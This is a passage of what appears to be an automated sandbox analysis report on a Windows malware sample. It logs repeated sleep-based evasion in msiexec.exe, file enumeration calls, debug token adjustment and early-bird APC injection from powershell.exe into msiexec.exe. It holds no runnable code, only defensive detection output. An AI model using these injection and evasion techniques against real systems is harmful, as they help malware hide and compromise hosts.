Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -599532s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -599407s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -599297s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -599187s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -599078s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -598969s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -598860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -598735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -598610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -598485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -598360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -598235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -598110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -597985s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -597235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -597110s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -596985s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -596735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -596485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -596116s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -596000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -595891s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -595781s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -595672s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -595563s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -595438s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -595313s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -595188s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -595078s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -594969s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -594844s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -594610s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe TID: 7592	Thread sleep time: -594110s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Code function: 0_2_00405841 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405841
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	Code function: 0_2_00406393 FindFirstFileW,FindClose,	0_2_00406393

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599187	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596985	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596116	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595891	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595438	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595313	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595188	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594969	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594844	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 594110	Jump to behavior

Source: powershell.exe, 00000001.00000002.2693602382.0000000005618000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter@\^q
Source: powershell.exe, 00000001.00000002.2693602382.0000000005618000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter@\^q
Source: powershell.exe, 00000001.00000002.2693602382.0000000005618000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000001.00000002.2693602382.0000000005618000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: msiexec.exe, 00000007.00000002.3037606643.0000000009624000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.3037606643.00000000095F8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000001.00000002.2693602382.0000000005618000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter@\^q
Source: powershell.exe, 00000001.00000002.2693602382.0000000005618000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter

Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	API call chain: ExitProcess graph end node			graph_0-2865
Source: C:\Users\user\Desktop\4Vx2rUlb0f.exe	API call chain: ExitProcess graph end node			graph_0-3044

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4480000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
